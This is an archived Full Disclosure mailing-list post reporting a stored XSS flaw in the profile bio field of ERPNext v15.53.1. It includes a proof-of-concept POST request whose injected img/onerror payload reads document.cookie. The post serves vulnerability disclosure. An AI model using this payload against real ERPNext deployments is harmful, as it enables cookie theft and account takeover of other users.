[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[FD] ERPNext v15.53.1 Stored XSS in bio Field Allows Arbitrary Script Execution in Profile Page

To: fulldisclosure@xxxxxxxxxxxx
Subject: [FD] ERPNext v15.53.1 Stored XSS in bio Field Allows Arbitrary Script Execution in Profile Page
From: Ron E <ronaldjedgerson@xxxxxxxxx>
Date: Fri, 30 May 2025 23:21:17 -0400

An authenticated attacker can inject JavaScript into the bio field of their
user profile. When the profile is viewed by another user, the injected
script executes.

*Proof of Concept:*

POST
/api/method/frappe.desk.page.user_profile.user_profile.update_profile_info
HTTP/2
Host: --host--

profile_info={"bio":"\"><img src=x onerror=alert(document.cookie)>"}
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Prev by Date: [FD] ERPNext v15.53.1 Stored XSS in user_image Field Allows Script Execution via Injected Image Path
Next by Date: [FD] CVE-2025-45542: Time-Based Blind SQL Injection in CloudClassroom PHP Project v1.0
Previous by thread: [FD] ERPNext v15.53.1 Stored XSS in user_image Field Allows Script Execution via Injected Image Path
Next by thread: [FD] CVE-2025-45542: Time-Based Blind SQL Injection in CloudClassroom PHP Project v1.0
Index(es):
- Date
- Thread